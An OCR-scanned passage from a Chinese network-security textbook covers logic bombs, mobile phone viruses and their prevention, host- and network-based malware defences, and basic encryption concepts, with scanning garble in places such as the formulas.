式 , 包 括 计 数 器 触发 方式 .时 间 和 触发 方式 、 文 
件 触发 方式 和 特点 用 户 访问 触发 方式 等 。 逻 
辑 炸弹 只 在 触发 条 件 满 足 后 , 才 开 始 执行 逻 
辑 炸 弹 的 破坏 功能 ,如 图 6-7 所 示 。 逻 辑 炸 弹 ~ 
一 县 触发 ,有 可 能 造成 文件 删除 服务 停止 和 re 
软件 中 断 运行 等 破坏 。 人 逻辑 炸弹 不 能 复制 自 
身 ,不 能 感染 其 他 程序 。 

(3) 细菌 (Bacteria) 是 指 具 有 自我 复制 功能 的 独立 程序 。 虽 然 细菌 不 会 直接 攻击 任何 
软件 ,但 是 它 通 过 复制 本 身 来 消化 系统 资源 。 例 如 , 某 个 细菌 先 创 建 两 个 文件 ,然后 以 两 个 
文件 为 基础 进行 自我 复制 ,那么 细菌 以 指数 级 快速 增长 ,很 快 就 会 消耗 尽 系统 的 资源 ,包括 
CPU 内存 和 磁盘 空间 等 。 


软件 程序 启动 


图 6-7 逻辑 炸弹 运行 示意 图 


6.7 手机 病毒 及 其 防范 措施 


6.7.1 手机 病毒 的 概念 


随 着 智能 手机 的 不 断 普 及 ,手机 病毒 也 越 来 越 多 地 出 现在 了 人 们 所 使 用 的 各 种 智能 手 
机 中 。 手 机 病毒 是 一 种 破坏 性 程序 ,和 计算 机 病毒 (程序 ) 一 样 具 有 传染 性 \ 破 坏 性 。 手 机 病 
毒 可 利用 发 送 短 信 、 彩 信 、 电 子 邮件 、 浏 览 网 站 、 下 载 铃 声 、 蓝 牙 等 方式 进行 传播 。 手 机 病毒 
可 能 会 导致 用 户 手 机 死机 ` 关 机、 资料 被 删 . 向 外 发 送 垃圾 邮件 .拨打 电 话 等 ,甚至 还 会 损毁 
SIM 卡 .芯片 等 硬件 。 

历史 上 最 早 的 手机 病毒 出 现在 2000 年 ,当时 ,手机 公司 Movistar 收 到 大 量 由 计算 机 发 
出 的 名 为 “Timofonica” 的 骚扰 短信 ,该 病毒 通过 西班牙 电信 公司 Telefonica 的 移动 系统 向 
系统 内 的 用 户 发 送 脏 话 等 垃圾 短信 。 事 实 上 ,该 病毒 最 多 只 能 被 算 做 短信 炸弹 。 真 正 意义 
上 的 手机 病毒 直到 2004 年 6 月 才 出 现 , 即 Cabir 蠕虫 病毒 ,这 种 病毒 通过 诺基亚 s60 系列 
手机 复制 ,然后 不 断 寻找 安装 了 蓝牙 的 手机 。 之 后 ,手机 病毒 开始 泛滥 。 目 前 , 随 着 我 国 3G 
牌照 的 正式 发 放 , 手 机 应 用 的 爆炸 式 增长 ,手机 所 面临 的 安全 威胁 很 快 将 超越 个 人 计算 机 ， 
成 为 个 人 信息 安全 的 第 一 大 隐患 。 隐 私信 息 被 瓷 、 窃 听 、 吸 费 等 威胁 攻击 手段 将 给 移动 网 络 
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应 用 和 个 人 信息 安全 带 来 极 大 威胁 。 
6.7.2 手机 病毒 的 传播 方式 及 其 危害 


手机 病毒 的 传播 方式 主要 有 以 下 几 种 。 

(1) 利用 蓝牙 方式 传播 。 例 如 ， 卡 波 尔 ? 病 毒 会 修改 智能 手机 的 系统 设置 ,通过 蓝牙 自 
动 搜 索 相 邻 的 手机 是 否 存在 漏洞 ,并 进行 攻击 。 

(2) 感染 PC 上 的 手机 可 执行 文件 。 例 如 ,“ 韦 拉 斯 科 ” 病 毒 感染 计算 机 后 ,会 搜索 计算 
机 硬盘 上 的 SIS 可 执行 文件 并 进行 感染 。 

(3) 利用 MMS 多 媒体 信息 服务 方式 来 传播 。 

(4) 利用 手机 的 Bug 传播 并 进行 攻击 。 这 类 病毒 一 般 是 在 便携 式 信息 设备 的 “EPOC” 
上 运行 , 如 “EPOC-ALARM”、“ EPOC-BANDINFO. A”、“EPOC-FAKE. A”、“EPOC- 
GHOST. A”“EPOC-ALIGHT. A” 等 。 

手机 病毒 的 危害 主要 有 以 下 几 个 方面 。 

(1) 导致 用 户 信息 被 窃 。 如 今 , 越 来 越 多 的 手机 用 户 将 个 人 信息 存储 在 手机 上 ,如 个 人 
通讯 录 . 个 人 信息 .日 程 安排 .各 种 网 络 账号 .银行 账号 和 密码 等 。 这 些 重 要 的 资料 ,必然 引 
来 一 些 别有用心 者 的 “ 垂 涨 ”, 他 们 会 编写 各 种 病毒 人 侵 手 机 ,窃取 用 户 的 重要 信息 。 

(2) 传播 非法 信息 。 目 前 ,彩信 已 非常 流行 ,这 为 各 种 色情 、 非 法 的 图 片 、 语 音 、 电 影 的 
传播 提供 了 便利 。 

(3) 破坏 手机 软 硬 件 。 这 是 手机 病毒 最 常见 的 危害 之 一 , 即 破坏 手机 的 软 、 硬 件 系统 ， 
导致 手机 无 法 正常 工作 。 

(4) 造成 通信 网 络 瘫痪 。 如 果 病 毒 感染 手机 后 ,强制 手机 不 断 地 向 所 在 通信 和 网络 发 送 
垃圾 信息 ,这 样 势必 导致 通信 网 络 信息 堵塞 。 这 些 垃圾 信息 最 终 会 让 局 部 的 手机 通信 网 络 
准 痪 。 

(5) 造成 话费 损失 。 当 手机 感染 了 病毒 或 木马 后 ,手机 会 自动 拨打 声讯 台 、 发 送信 息 、 
订购 增值 业务 等 ,造成 用 户 的 话费 损失 。 


6.7.3 手机 病毒 的 种 类 


手机 病毒 按 病毒 形式 通常 可 以 分 为 以 下 4 类 : 

(1) 通过 蓝牙 设备 传播 的 病毒 ,比如 “ 卡 比尔 ”、Lasco. A 等 。 

“ 卡 比 尔 ”(Cabir) 是 一 种 网 络 蠕虫 病毒 , 它 可 以 感染 运行 Symbian 操作 系统 的 手机 。 手 
机 中 了 该 病毒 后 ,使 用 蓝牙 无 线 功能 会 对 邻近 的 其 他 存在 漏洞 的 手机 进行 扫描 ,在 发 现 漏洞 
手机 后 ,病毒 就 会 复制 自己 并 发 送 到 该 手机 上 。 

Lasco. A 病毒 的 工作 原理 与 蠕虫 病毒 一 样 ,通过 蓝牙 无 线 传播 到 其 他 手机 上 , 当 用 户 点 
击 病毒 文件 后 ,病毒 随即 被 激活 。 

(2) 针对 移动 通信 商 的 手机 病毒 ,比如 * 和 蚊子 木马 ”。 

这 类 病毒 隐藏 于 手机 游戏 “ 打 蚊 子 ” 的 破解 版 中 。 虽 然 该 病毒 不 会 窃取 或 破坏 用 户 资 
料 ,但 是 它 会 自动 拨号 ,向 所 在 地 为 英国 的 号 码 发 送 大量 文 本 信息 ,结果 导致 用 户 的 信息 费 
剧 增 。 
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(3) 针对 手机 Bug 的 病毒 ,比如 “移动 黑客 ”。 

移动 黑客 (Hack. mobile. smsdos) 病 毒 通过 带 有 病毒 程序 的 短信 传播 ,只 要 用 户 查 看 带 
有 病毒 的 短信 ,手机 即刻 自动 关闭 。 

(4) 利用 短信 或 彩信 进行 攻击 的 Mobile. SMSDOS 病毒 ,典型 的 例子 就 是 出 现 的 针对 
西门 子 手机 的 Mobile. SMSDOS 病毒 。 

Mobile. SMSDOS 病毒 可 以 利用 短信 或 彩信 进行 传播 ,造成 手机 内 部 程序 出 错 , 从 而 导 
致 手机 不 能 正常 工作 。 


6.7.4 手机 病毒 的 防范 


为 了 防范 手机 病毒 ,可 以 采取 以 下 的 一 些 措施 。 

1. 删除 乱码 短信 和 彩信 

乱码 短信 、 彩 信 可 能 带 有 病毒 , 收 到 此 类 短信 后 立即 删除 ,以 免 感染 手机 病毒 。 

2. 不 要 接受 陌生 请 求 

利用 无 线 传送 功能 比如 蓝牙 .红外 接收 信息 时 ,一 定 要 选择 安全 可 靠 的 传送 对 象 ,如 果 
有 陌生 设备 请 求 连 接 时 ,最 好 仔细 判断 慎重 决定 。 因 为 手机 病毒 会 自动 搜索 无 线 范围 内 的 
设备 进行 病毒 的 传播 。 

3. 保证 下 载 的 安全 性 

现在 网 上 提供 了 许多 资源 供 手 机 下 载 ,而 很 多 病毒 就 隐藏 在 这 些 资源 中 ,这 就 要 求 用 户 
在 使 用 手机 下 载 各 种 资源 的 时 候 确保 下 载 站 点 是 否 安全 可 靠 , 尽 量 避 免 去 个 人 网 站 下 载 。 

4. 选择 手机 自 带 的 背景 

漂亮 的 背景 图 片 与 屏保 固然 让 人 赏心悦目 ,但 图 片 中 有 可 能 隐藏 有 病毒 ,因此 ,用 户 最 
好 使 用 手机 自 带 的 图 片 进 行 背景 设置 。 

5. 不 要 浏览 危险 网 站 

这 些 危 险 网 站 包括 一 些 黑客 .色情 网 站 ,这 类 网 站 具有 一 定 的 危险 性 ,其 中 隐匿 着 许多 
病毒 与 木马 ,用 手机 浏览 此 类 网 站 是 非常 危险 的 。 

6. 使 用 不 具备 上 网 功能 的 手机 

特殊 情况 下 ,如 果 只 是 用 通话 功能 ,为 了 保证 手机 的 安全 ,可 以 使 用 不 具备 上 网 功能 的 
手机 。 

感染 了 手机 病毒 以 后 ,可 以 采用 以 下 的 方法 清除 手机 病毒 。 

(1) 使 用 手机 版 的 杀 病 毒 软件 。 随 着 手机 病毒 的 蔓延 ,各 种 杀毒 软件 厂商 也 纷纷 跟 进 ， 
推出 了 基于 手机 平台 的 专用 杀毒 软件 ,提供 给 手机 一 个 全 面 的 安全 保障 平台 。 例 如 ,软件 厂 
商 金山 公司 就 推出 了 金山 毒霸 手机 版 ,支持 SymbianS60 和 Windows Mobile 操作 系统 平 
台 ,该 软件 通过 文件 扫描 方式 ,检查 手机 及 存储 卡 内 的 所 有 文档 ,发 现 病毒 后 进行 提示 并 查 
杀 ; 另外 ,该 软件 可 以 对 任意 关系 到 文件 改变 的 动作 进行 自动 监控 ,包括 下 载 文 件 、 接 收 短 
信 等 ,整个 过 程 完 全 自动 处 理 , 从 而 保护 内 存 和 存储 卡 中 的 资料 不 被 感染 破坏 。 
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(2) 删除 带 有 病毒 的 短信 。 如 果 发 现 手 机 已 经 感染 病毒 ,应 立即 关机 ,如 出 现 死机 等 情 
况 , 则 可 取 下 电池 ,然后 将 SIM 卡 取 出 并 插入 另 一 型 号 的 手机 中 (手机 品牌 最 好 不 一 样 ) ,将 
存 于 SIM 卡 中 的 可 疑 短 信 删 除 后 ,重新 将 卡 插 回 原 手 机 。 如 果 仍 然 无 法 使 用 , 则 可 以 与 手 
机 服务 商 联系 ,通过 无 线 网 站 对 手机 进行 杀毒 ,或 通过 手机 的 IC 接 入 口 或 红外 传输 接口 进 


6.8 恶意 代码 防范 方法 


目前 ,恶意 代码 防范 方法 主要 包括 两 个 方面 : 基于 主机 的 恶意 代码 防范 方法 和 基于 网 
络 的 恶意 代码 防范 方法 。 


6.8.1 基于 主机 的 恶意 代码 防范 方法 

这 类 防范 方法 主要 包括 : 基于 特征 的 扫描 技术 、 校 验 和 、 沙 箱 技术 和 安全 操作 系统 对 恶 
意 代 码 的 防范 等 。 

1. 基于 特征 的 扫描 技术 

基于 主机 的 恶意 代码 防范 方法 是 目前 检测 恶意 代码 最 常用 的 技术 ,主要 源 于 模式 匹配 
的 思想 。 扫 描 程序 工作 之 前 ,必须 先 建立 恶意 代码 的 特征 文件 ,根据 特征 文件 中 的 特征 串 ， 
在 扫描 文件 中 进行 匹配 查找 。 用 户 通过 更 新 特征 文件 更 新 扫描 软件 ,查找 最 新 的 恶意 代码 
版 本 。 这 种 技术 广泛 地 应 用 于 目前 的 反 病毒 引擎 中 ,其 工作 流程 如 图 6-8 所 示 。 


入 口 


一 一 一 | 文件 类 型 检测 模块 


解压 


可 执行 文件 | | 其 他 二 进 制 文件 | | 文本 文件 | | Office 文 件 


(DLL 和 OCX 等 ) 
预 处 理 
脱 这 模块 上 盖 拓 加 这 文 作 几时 证 


下 语法 分 析 器 


二 进 制 检测 引擎 全 到 基本 检测 引擎 


图 6-8 恶意 代码 防范 工作 流程 


通过 类 型 检测 模块 对 文件 类 型 进行 判断 ,这 是 对 恶意 代码 进行 分 类 的 前 提 , 对 于 压缩 文 
件 , 还 要 先 解压 缩 , 再 将 解压 出 来 的 文件 重新 交 给 类 型 检测 模块 处 理 。 要 考虑 一 个 递归 的 解 
压缩 模块 ,处 理 多 重 和 混合 压缩 等 问题 。 
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对 于 非 压缩 类 型 的 对 象 ,按照 类 型 的 不 同 分 为 4 种 不 同 的 处 理 方式 。 对 于 可 执行 文件 ， 
首先 要 通过 一 个 外 壳 检测 模块 ,判断 是 否 经 过 ASPACK 、UPX 等 目前 流行 的 可 执行 文件 加 
过 工具 处 理 ,这 个 脱 壳 模块 也 是 递归 的 ,直到 不 需要 脱 壳 处 理 为 止 , 最 后 交 给 二 进 制 检测 引 
擎 处 理 。 对 于 文本 类 型 文件 ,主要 是 进行 脚本 病毒 检测 ,目前 对 于 VBScript、JavaScript、 
PHP 和 Perl 等 多 种 类 型 的 脚本 病毒 ,需要 先 交 给 语法 分 析 器 去 处 理 , 语 法 分 析 器 处 理 后 的 
结果 再 交 给 检测 引擎 做 匹配 处 理 。 部 分 反 病 毒 软件 的 宏 病 毒 检测 就 是 交 给 脚本 处 理 引 擎 完 
成 的 。 通 过 Office 预 处 理 提 取出 宏 Basic 源码 之 后 ,也 可 以 同样 交 给 语法 分 析 器 进行 处 理 。 

目前 ,基于 特征 的 扫描 技术 主要 存在 两 个 方面 的 问题 。 

(1) 它 是 一 种 特征 匹配 算法 ,对 于 加 密 、 变 形 和 未 知 的 恶意 代码 不 能 很 好 地 处 理 。 

(2) 需要 用 户 不 断 升级 更 新 检测 引擎 和 特征 数据 库 ,不 能 预警 恶意 代码 入 侵 , 只 能 做 事 
后 处 理 。 

2. 校 验 和 

校 验 和 是 一 种 保护 信息 资源 完整 性 的 控制 技术 ,例如 Hash 值 和 循环 元 余 码 等 。 只 要 
文件 内 部 有 一 个 比特 发 生 了 变化 , 校 验 和 值 就 会 改变 。 未 被 恶意 代码 感染 的 系统 首先 会 生 
成 检测 数据 ,然后 周期 性 地 使 用 校 验 和 法 检测 文件 的 改变 情况 。 运 用 校 验 和 法 检查 恶意 代 
码 有 三 种 方法 。 

(1) 在 恶意 代码 检测 软件 中 设置 校 验 和 法 。 对 检测 的 对 象 文件 计算 其 正常 状态 的 校 验 
和 并 将 其 写 人 被 查 文件 中 或 检测 工具 中 ,而 后 进行 比较 。 

(2) 在 应 用 程序 中 嵌入 校 验 和 法 。 将 文件 正常 状态 的 校 验 和 写 入 文件 本 身 中 ,每 当 应 
用 程序 启动 时 ,比较 现行 校 验 和 与 原始 校 验 和 ,实现 应 用 程序 的 自我 检测 功能 。 

(3) 将 校 验 和 程序 常 驻 内 存 。 每 当 应 用 程序 开始 运行 时 ,自动 比较 检查 应 用 程序 内 部 
或 别 的 文件 中 预 留 保存 的 校 验 和 。 

校 验 和 可 以 检测 未 知 恶 意 代码 对 文件 的 修改 ,但 也 有 两 个 缺点 。 

(1) 校 验 和 法 实际 上 不 能 检测 文件 是 否 被 恶意 代码 感染 , 它 只 是 查找 变化 ,即使 发 现 恶 
意 代码 造成 了 文件 的 改变 , 校 验 和 法 也 无 法 将 恶意 代码 消除 ,也 不 能 判断 究 况 被 哪 种 恶意 代 
码 感染 。 

(2) 恶意 代码 可 以 采用 多 种 手段 欺骗 校 验 和 法 ,使 之 认为 文件 没有 改变 。 

3. 沙 箱 技术 

沙 箱 技术 指 根据 系统 中 每 一 个 可 执行 程序 的 访问 资源 ,以 及 系统 赋予 的 权限 建立 应 用 
程序 的 “ 沙 箱 ”, 限 制 恶意 代码 的 运行 。 每 个 应 用 程序 都 运行 在 自己 的 且 受 保护 的 “ 沙 箱 ” 之 
中 ,不 能 影响 其 他 程序 的 运行 。 同 样 ,这 些 程 序 的 运行 也 不 能 影响 操作 系统 的 正常 运行 , 操 
作 系 统 与 驱动 程序 也 存活 在 自己 的 “ 沙 箱 ” 之 中 。 美 国 加 州 大 学 Berkeley 实验 室 开发 了 基 
于 Solaris 操作 系统 的 沙 箱 系统 ,应 用 程序 经 过 系统 底层 调用 解释 执行 ,系统 自动 判断 应 用 
程序 调用 的 底层 函数 是 否 符合 系统 的 安全 要 求 ,并 决定 是 否 执行 。 

对 于 每 个 应 用 程序 , 沙 箱 都 为 其 准备 了 一 个 配置 文件 ,限制 该 文件 能 够 访问 的 资源 与 系 
统 赋予 的 权限 。Windows XP/2003/2008 操作 系统 提供 了 一 种 软件 限制 策略 ,隔离 具有 洪 
在 危害 的 代码 。 这 种 隔离 技术 其 实 也 是 一 种 沙 箱 技术 ,可 以 保护 系统 免 受 通过 电子 邮件 和 
Internet 传染 的 各 种 恶意 代码 的 侵害 。 这 些 策略 允许 选择 系统 管理 应 用 程序 的 方式 : 应 用 
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程序 既 可 以 被 “限制 运行 ”, 也 可 以 "禁止 运行 ”。 通 过 在 * 沙 箱 ? 中 执行 不 受信 任 的 代码 与 脚 
本 ,系统 可 以 限制 甚至 防止 恶意 代码 对 系统 完整 性 的 破坏 。 

4. 安全 操作 系统 对 恶意 代码 的 防范 

恶意 代码 成 功 入 侵 的 重要 一 环 是 获得 系统 的 控制 权 , 使 操作 系统 为 它 分 配 系统 资源 。 
无 论 哪 种 恶意 代码 ,无 论 要 达到 何 种 恶意 目的 ,都 必须 具有 相应 的 权限 。 没 有 足够 的 权限 ， 
恶意 代码 不 可 能 实现 其 预定 的 恶意 目标 ,或 者 仅 能 够 实现 其 部 分 恶意 目标 。 


6.8.2 基于 网 络 的 恶意 代码 防范 方法 


由 于 恶意 代码 具有 相当 的 复杂 性 和 行为 不 确定 性 ,恶意 代码 的 防范 需要 多 种 技术 综合 
应 用 ,包括 恶意 代码 监测 与 预警 .恶意 代码 传播 抑制 .恶意 代码 漏洞 自动 修复 .恶意 代码 阻 断 
等 。 基 于 网 络 的 恶意 代码 防范 方法 包括 : 恶意 代码 检测 防御 和 恶意 代码 预警 。 

其 中 常见 的 恶意 代码 检测 防御 包括 : 基于 GrIDS 的 恶意 代码 检测 、 基 于 PLD 硬件 的 检 
测 防御 、 基 于 Honeypot 的 检测 防御 和 基于 CCDC 的 检测 防御 。 

1. 基于 GrIDS 的 恶意 代码 检测 

著名 的 GrIDS 主要 是 针对 大 规模 网 络 攻 击 和 自动 化 入 侵 设 计 的 , 它 收集 计算 机 和 网 络 
活动 的 数据 以 及 它们 之 间 的 连接 ,在 预先 定义 的 模式 库 的 驱动 下 ,将 这 些 数据 构建 成 网 络 活 
动 行为 来 表征 网 络 活动 结构 上 的 因果 关系 。 它 通过 建立 和 分 析 结 点 间 的 行为 图 (Activity 
Graph) ,通过 与 预定 义 的 行为 模式 图 进行 匹配 ,检测 恶意 代码 是 否 存 在 。 该 工具 是 当前 检 
测 分 布 式 恶意 代码 入 侵 比 较 有 效 的 工具 。 

2. 基于 PLD 硬件 的 检测 防御 

华盛顿 大 学 应 用 研究 室 的 John W. Lockwood James Moscolal 和 MatthewKulig 等 提 
出 了 一 种 采用 可 编程 逻辑 设备 (Programmable Logic Devices,PLDs) 对 抗 恶 意 代 码 的 防范 
系统 。 该 系统 由 三 个 相互 内 联 的 部 件 组 成 : 数据 控制 设备 (Data Enabling Device,DED) 、 内 
容 匹 配 服务 (Content Matching Server, CMS) 和 区 域 事务 处 理 器 (Regional Transaction 
Processor,RTP) 。 

DED 负责 捕获 流 经 网 络 出 入口 的 所 有 数据 包 , 根 据 CMS 提供 的 特征 串 或 规则 表达 式 
对 数据 包 进 行 扫描 匹配 并 把 结果 传递 给 RTP; CMS 负责 从 后 台 的 MySQL 数据 库 中 读 取 
已 经 存在 的 恶意 代码 特征 ,编译 综合 成 DED 设备 可 以 利用 的 特征 串 或 规则 表达 式 ; RTP 
根据 匹配 结果 决定 DED 采取 何 种 操作 。 恶 意 代 码 大 规模 入 侵 时 ,系统 管理 员 首 先 把 该 恶意 
代码 的 特征 添加 到 CMS 的 特征 数据 库 中 ,DED 扫描 到 相应 特征 才 会 请 求 RTP 做 出 放行 还 
是 阻 断 等 响应 。 

3. 基于 Honeypot 的 检测 防御 

早期 的 Honeypot 主要 用 于 防范 网 络 黑 客 攻击 。ReVirt 是 能 够 检测 网 络 攻击 或 网 络 异 
常 行为 的 Honeypot 系统 。Spitzner 首次 运用 Honeypot 防御 恶意 代码 攻击 。Honeypot 之 
间 可 以 相互 共享 捕获 的 数据 信息 ,采用 NIDS 的 规则 生成 器 产生 恶意 代码 的 匹配 规则 , 当 恶 
意 代码 根据 一 定 的 扫描 策略 扫描 存在 漏洞 主机 的 地 址 空间 时 , Honeypots 可 以 捕获 恶意 代 
码 扫描 攻击 的 数据 ,然后 采用 特征 匹配 来 判断 是 否 有 恶意 代码 攻击 。 
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4. 基于 CCDC 的 检测 防御 

由 于 主动 式 传播 恶意 代码 具有 生物 病毒 特征 ,美国 安全 专家 提议 建立 病毒 控制 中 心 
(The Cyber Centers for Disease Control, CCDC) 来 对 抗 恶 意 代码 攻击 。 防 范 恶 意 代码 的 
CCDC 体系 实现 以 下 功能 : 鉴别 恶意 代码 的 爆发 期 ; @ 恶 意 代码 样本 特征 分 析 ; @ 恶 意 
代码 传染 对 抗 ; @ 恶 意 代 码 新 的 传染 途径 预测 ; @ 前 摄 性 恶意 代码 对 抗 工具 研究 ; @ 对 抗 
未 来 恶意 代码 的 威胁 。 

CCDC 能 够 实现 对 大 规模 恶意 代码 入 侵 的 预警 .防御 和 阻 断 。 但 CCDC 也 存在 一 些 问 
题 : DCCDC 是 一 个 规模 庞大 的 防范 体系 ,要 考虑 体系 运转 的 代价 ; 四 由 于 CCDC 体系 的 
开放 性 ,CCDC 自身 的 安全 问题 不 容 忽视 ; @ 在 CCDC 防范 体系 中 ,攻击 者 能 够 监测 恶意 代 
码 攻 击 的 全 过 程 ,深入 理解 CCDC 防范 恶意 代码 的 工作 机 制 , 因 此 可 能 导致 突破 CCDC 防 
范 体系 的 恶意 代码 出 现 。 


第 7 章 信息 加 密 技 术 


本 章 学 习 要 求 : 

。 了 解 信息 加 密 的 相关 概念 。 

。 掌握 DES 对 称 加 密 技 术 和 RSA 公 钥 加 密 技 术 。 
。 了解 认 证 技术 的 相关 概念 与 技术 。 

。 了 解 公 钥 基础 设施 PKI 的 相关 概念 。 


7.1 数据 加 密 概 述 


7.1.1 密码 学 的 概念 


密码 学 是 一 门 古老 而 深奥 的 学 科 ,对 一 般 人 来 说 是 非常 陌生 的 。 长 期 以 来 ,只 在 很 小 范 
围 内 使 用 ,如 军事 外交、 情报 等 部 门 。 计 算 机 密码 学 是 研究 计算 机 信息 加 密 、 解 密 及 其 变换 
的 科学 ,是 数学 和 计算 机 的 交叉 学 科 , 也 是 一 门 新 兴 的 学 科 。 

密码 学 的 历史 比较 悠久 ,在 四 千年 前 , 古 埃及 人 就 开始 使 用 密码 来 保密 传递 的 消息 。 两 
千 多 年 前 ,罗马 国王 Julius Caesare( 恺 撤 ) 就 已 经 使 用 目前 称 为 “已 撤 密 码 ” 的 密码 系统 。 但 
是 密码 技术 直到 20 世纪 40 年 代 以 后 才 有 重大 突破 和 发 展 。 特 别 是 20 世纪 70 年 代 后 期 ， 
由 于 计算 机 、 电 子 通信 技术 的 广泛 使 用 ,现代 密码 学 得 到 了 空前 的 发 展 。 

密码 学 包括 密码 编码 学 和 密码 分 析 学 。 密 码 体制 的 设计 是 密码 编码 学 的 主要 内 容 , 密 
码 体制 的 破译 是 密码 分 析 学 的 主要 内 容 。 密 码 编码 技术 和 密码 分 析 技 术 是 相互 依存 .相互 
支持 、 密 不 可 分 的 两 个 方面 。 

密码 学 不 仅 是 编码 与 破译 的 学 问 ,而 且 包 括 安全 管理 、 安 全 设计 、 秘 密 分 存 、 散 列 函 数 等 
内 容 。 经 过 发 展 , 密 码 学 已 被 有 效 地 .系统 地 用 于 保证 电子 数据 的 保密 性 、 完 整 性 和 真实 性 。 
保密 性 是 对 数据 进行 加 密 ,使 非法 用 户 无 法 读 懂 数 据 信 息 。 完 整 性 是 对 数据 的 完整 性 的 鉴 
别 , 以 确定 数据 是 否 被 非法 算 改 ,保证 合法 用 户 得 到 正确 完整 的 信息 。 真 实 性 是 数据 来 源 的 
真实 性 ,数据 本 身 真实 性 的 鉴别 ,可 以 保证 合法 用 户 不 被 欺骗 。 到 目前 为 止 ,密码 学 中 出 现 
了 大 量 的 新 技术 和 新 概念 ,例如 : 零 知 识 证 明 技 术 、 盲 签名、 比特 承 诺 、 遗 忘 传递 ,数字 化 现 
金 . 量 子 密码 技术 和 混沌 密码 等 。 

基于 密码 技术 的 访问 控制 是 防止 数据 传输 泄密 的 主要 防护 手段 。 访 问 控制 的 类 型 可 分 
为 两 类 : 初始 保护 和 持续 保护 。 初 始 保 护 只 在 入 口 处 检查 存 取 控制 权限 ,一 旦 被 获准 , 则 此 
后 的 一 切 操作 都 不 在 安全 机 制 控制 之 下 ,防火 墙 可 提供 初始 保护 。 持 续 保 护 指 在 网 络 中 的 
入 口 及 数据 传输 过 程 中 都 受到 存 取 权 限 的 检查 ,这 是 为 了 防止 监听 、 重 发 和 算 改 链 路 上 的 数 
据 以 窃取 对 主机 的 存 取 控 制 。 
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7.1.2 信息 加 密 的 基本 概念 


1. 信息 和 加 密 
数据 加 密 的 过 程 就 是 通过 加 密 系统 把 原始 的 数据 (明文 ) ,按照 加 密 算法 变换 成 与 明文 
完全 不 同 的 数据 ( 密 文 ) 的 过 程 。 该 过 程 的 逆 过 发 送 端 接收 端 
程 为 解密 。 加 密 和 解密 过 程 如 图 7-1 所 示 。 a [a [a 
明文 用 M(Message, 消 息 ) 或 PCPlaintext， 六 od ~ 
明文 ) 表 示 , 它 可 能 是 比特 流 、 文 本 文件 位 图 , 数 1 1 
字 化 的 语音 流 或 者 数字 化 的 视频 图 像 等 。 密 钥 玉 密 钥 K 
密 文 用 CCCipher) 表 示 ,也 是 二 进 制 数据 ,有 图 7-1 加 密 和 解密 


时 和 M 一 样 大 ,有 时 稍 大 。 

加 密 函 数 EE 作 用 于 M 得 到 密 文 C, 用 数学 公式 表示 为 : ECM) 一 C。 解 密 函 数 D 作用 
于 C 产生 M ,用 数据 公式 表示 为 : D(CC)=M。 先 加 密 后 再 解密 消息 ,原始 的 明文 将 恢复 出 
来 ,DCE(CM) ) 一 M 必须 成 立 。 

2. 鉴别 .完整 性 和 抗 抵赖 性 

数据 被 加 密 只 是 实现 了 密码 学 提供 的 机 密 性 ,密码 学 还 同时 提供 其 他 三 方面 的 功能 : 
鉴别 ,完整 性 和 抗 抵赖 性 。 这 些 功 能 是 通过 计算 机 进行 社会 交流 的 至 关 重要 的 需求 。 

(1) 鉴别 : 消息 的 接收 者 应 该 能 够 确认 消息 的 来 源 , 入 侵 者 不 可 能 伪装 成 他 人 。 

(2) 完整 性 : 消息 的 接收 者 应 该 能 够 验证 在 传送 过 程 中 消息 没有 被 修改 ,入 侵 者 不 可 
能 用 假 消 息 代替 合法 消息 。 

(3) 抗 抵赖 性 : 发 送 消 息 者 事后 不 可 能 虚假 地 否认 他 发 送 的 消息 。 

3. 算法 和 密 钥 

密码 算法 (Algorithm) 也 叫 密码 CCipher) ,是 用 于 加 密 和 解密 的 数学 函数 。 通 常情 况 
下 ,有 两 个 相关 的 函数 ,一 个 用 做 加 密 , 另 一 个 用 做 解密 。 

如 果 算 法 的 保密 性 是 基于 保持 算法 的 秘密 ,这 种 算法 称 为 受 限制 的 算法 。 受 限制 的 算 
法 具有 历史 意义 ,但 按 现在 的 标准 ,它们 的 保密 性 已 远 远 不 够 。 大 的 或 经 常 变换 的 用 户 组 织 
不 能 使 用 它们 ,因为 如 果 有 一 个 用 户 离开 这 个 组 织 , 其 他 的 用 户 就 必须 更 换 另 外 不 同 的 算 
法 。 如 果 有 人 无 意 暴 露 了 这 个 秘密 .所 有 人 都 必须 改变 他 们 的 算法 。 

受 限制 的 密码 算法 不 可 能 进行 质量 控制 或 标准 化 。 每 个 用 户 组 织 必须 有 他 们 自己 的 唯 
一 算法 。 这 样 的 组 织 不 可 能 采用 流行 的 硬件 或 软件 产品 ,因为 偷窃 者 可 以 买 到 这 些 流行 产 
品 并 学 习 算 法 ,于 是 用 户 不 得 不 自己 编写 算法 并 予以 实现 ,如 果 这 个 组 织 中 没有 好 的 密码 学 
家 ,那么 他 们 就 无 法 知道 他 们 是 否 拥 有 安全 算法 。 

现代 密码 学 用 密 钥 (Key) 解 决 了 这 个 问题 , 密 钥 用 K 表示 。K 可 以 是 很 多 数值 里 的 任 
意 值 。 密 钥 K 的 可 能 值 的 范围 叫做 密 钥 空间 。 加 密 和 解密 运算 都 使 用 这 个 密 钥 ( 即 运算 都 
依赖 于 密 钥 ,并 用 K 作为 下 标 表示 ) ,这样 , 加 /解密 函数 现在 变 成 : 

Exr(M=C 
Dia(C) 三 1 
这 些 函 数 有 下 面 的 特性 : 


第 7 章 信息 加 密 技 术 169 


DrCEkCM)) 一 M 
有 些 算 法 使 用 不 同 的 加 密 密 钥 和 解密 密 钥 ,也 就 是 说 加 密 密 钥 K; 与 相应 的 解密 密 钥 
Ks 不 同 ,在 这 种 情况 下 ,加 解密 函数 变 成 : 
Ean(M=C 
DatOy = 
Dr(CEm (COM)) = M 
这 些 算法 的 安全 性 都 基于 密 钥 的 安全 性 ,而 不 是 基于 算法 细节 的 安全 性 。 这 就 意味 着 
算法 可 以 公开 ,也 可 以 被 分 析 , 可 以 大 量 生产 使 用 算法 的 产品 ,即使 偷 窍 者 知道 用 户 的 算法 
也 没有 关系 。 如 果 他 不 知道 用 户 使 用 的 具体 密 钥 ,他 就 不 可 能 阅读 用 户 的 消息 。 
密码 系统 (Cryptosystem) 由 算法 以 及 所 有 可 能 的 明文 、 密 文 和 密 钥 组 成 。 
4. 对 称 算法 
基于 密 钥 的 算法 通常 有 两 类 : 对 称 算法 和 公开 密 钥 算 法 。 
对 称 密 钥 有 时 又 叫做 传统 密码 算法 ,加 密 密 钥 能 够 从 解密 密 钥 中 推算 出 来 , 反 过 来 也 成 
